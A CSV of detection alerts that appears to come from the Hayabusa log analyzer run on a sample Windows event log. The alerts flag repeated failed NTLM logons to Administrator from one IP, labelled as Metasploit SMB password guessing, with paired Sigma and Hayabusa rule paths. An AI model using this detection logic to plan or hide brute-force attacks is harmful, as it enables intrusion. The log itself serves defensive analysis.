+2016-09-20 01:50:52.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SAxij8QYLxxriIvu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.092 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HK2tbzICSpTrglud  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.134 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4rHJ70VrEwCQjSvL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.176 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8qwZT66ExkdJDZaT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.225 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ezuHluj1fEC9KdQ1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.260 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bXH5uDfo4WB6QEnQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yWvZjuZhnGcrelOM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.336 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vb6ePjmpA8ZwK1PW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.434 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7e1A9ZY20WM8oDn6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.473 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 71GKLnXqSEEuc1Fw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.523 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: w0GsW0vDEkpRa1X0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.556 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0HH6zUUoL0qlfFC2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AG4pYsjob1iwlOc0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.636 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dNCX5tZ0nF1foTLW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.677 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.710 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vO82Kb0kboVFuJy6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.710 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DptE2C8ZK3AxCb43  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.871 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NC8manvVP5pU8F3N  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.871 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.926 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: m00bI5welsLUWmwJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.926 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4shyxJk2PiH1TDlj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.014 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xZyN2WO3UVY0WQs6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.014 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.053 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oSQjAMckifap5r1k  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.053 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qixqXiX0mVcuXe37  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.126 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gIfJCJz6l36WMeY9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.126 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SZxv5U7uoN6E8c8E  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.166 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mlIfE0N32OQeWuNw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.209 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nkZcjpTmHcJ0uX38  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GZfaHr2Yq6xkRjOI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.301 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jvy0EIiPSnom7pn3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.336 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TN9PUb0BgI3u8Xax  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.380 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.429 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xCgz5BNpQgLgW0Xi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.429 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.478 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: po2GBdrXr3XtBsWR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.478 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: O2rgo6jHcqu10IGY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MLblUOGzYzVA47E9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.573 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ysuA1xpYuAGRNONJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.616 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ksedziaGzXk5VNlS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.660 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.711 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: irIfGLQdhtRRGwuo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.711 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YCf6WUjiS11hHqKT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.752 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1o0CTT7GsWfCWuHx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: F6Jr8XrUsmTiSdol  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.832 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Buj66iuSkLEQdKnQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.868 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.912 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: L1wOLI51HqfkgO6r  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.912 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: X4oe273WXOICzkwW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.945 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1c7nGezYNJ70jR6R  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.992 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ajuZ09zGeuovCQLg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.037 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: z4k7xV7soNF4mHlz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.081 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
